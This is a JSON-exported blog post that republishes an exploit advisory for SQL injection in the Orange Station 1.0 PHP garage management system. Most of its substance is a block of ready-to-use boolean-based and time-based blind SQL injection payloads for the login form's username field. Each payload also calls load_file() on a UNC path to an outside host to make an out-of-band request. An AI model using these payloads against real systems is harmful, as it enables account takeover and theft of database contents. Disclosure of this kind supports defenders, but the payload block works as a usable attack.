{"id":27200,"date":"2022-07-18T21:20:02","date_gmt":"2022-07-18T17:20:02","guid":{"rendered":"https:\/\/packetstormsecurity.com\/files\/167758\/orangestation10-sql.txt"},"modified":"2022-07-20T08:51:22","modified_gmt":"2022-07-20T04:21:22","slug":"orange-station-1-0-sql-injection","status":"publish","type":"post","link":"https:\/\/afaghhosting.net\/blog\/orange-station-1-0-sql-injection\/","title":{"rendered":"Orange Station 1.0 SQL Injection"},"content":{"rendered":"

## Title: Orange Station 1.0 SQLi
\n## Author: nu11secur1ty
\n## Date: 0.16.2022
\n## Vendor: https:\/\/www.mayurik.com\/
\n## Software: https:\/\/www.sourcecodester.com\/php\/15485\/garage-management-system-using-phpmysql-source-code.html
\n## Reference: https:\/\/github.com\/nu11secur1ty\/CVE-nu11secur1ty\/tree\/main\/vendors\/mayuri_k\/2022\/Orange-Station-1.0<\/p>\n

## Description:
\nThe `username` parameter appears to be vulnerable to SQL injection attacks.
\nThe attacker can take administrator accounts control and also of all
\naccounts, also the malicious user can download all information about
\nthis system.<\/p>\n

Status: CRITICAL<\/p>\n

[+] Payloads:<\/p>\n

“`mysql
\n—
\nParameter: username (POST)
\nType: boolean-based blind
\nTitle: OR boolean-based blind – WHERE or HAVING clause (NOT)
\nPayload: username=mayuri.infospace@gmail.com’+(select
\nload_file(‘\\\\\\\\kh5oq0o5iyhgxexnhrx8pzcwyn4hs8mwdz1rohc6.beauty.com\\\\jlb’))+”
\nOR NOT 8287=8287 AND ‘jOHi’=’jOHi&password=rootadmin&login=<\/p>\n

Type: time-based blind
\nTitle: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
\nPayload: username=mayuri.infospace@gmail.com’+(select
\nload_file(‘\\\\\\\\kh5oq0o5iyhgxexnhrx8pzcwyn4hs8mwdz1rohc6.beauty.com\\\\jlb’))+”
\nAND (SELECT 3074 FROM (SELECT(SLEEP(15)))cvLH) AND
\n‘yPPS’=’yPPS&password=rootadmin&login=
\n—<\/p>\n

“`<\/p>\n

## Reproduce:
\n[href](https:\/\/github.com\/nu11secur1ty\/CVE-nu11secur1ty\/tree\/main\/vendors\/mayuri_k\/2022\/Orange-Station-1.0)<\/p>\n

## Proof and Exploit:
\n[href](https:\/\/streamable.com\/sz3tfi)<\/p>\n","protected":false},"excerpt":{"rendered":"

## Title: Orange Station 1.0 SQLi ## Author: nu11secur1ty ## Date: 0.16.2022 ## Vendor: https:\/\/www.mayurik.com\/ ## Software: https:\/\/www.sourcecodester.com\/php\/15485\/garage-management-system-using-phpmysql-source-code.html ## Reference: https:\/\/github.com\/nu11secur1ty\/CVE-nu11secur1ty\/tree\/main\/vendors\/mayuri_k\/2022\/Orange-Station-1.0 ## Description: The `username` parameter appears to be vulnerable to SQL injection attacks. The attacker can take administrator accounts control and also of all accounts, also the malicious user can download all information about …<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"closed","ping_status":"closed","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[26],"tags":[],"class_list":["post-27200","post","type-post","status-publish","format-standard","hentry","category-vulnerability"],"_links":{"self":[{"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/posts\/27200","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/comments?post=27200"}],"version-history":[{"count":0,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/posts\/27200\/revisions"}],"wp:attachment":[{"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/media?parent=27200"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/categories?post=27200"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/tags?post=27200"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}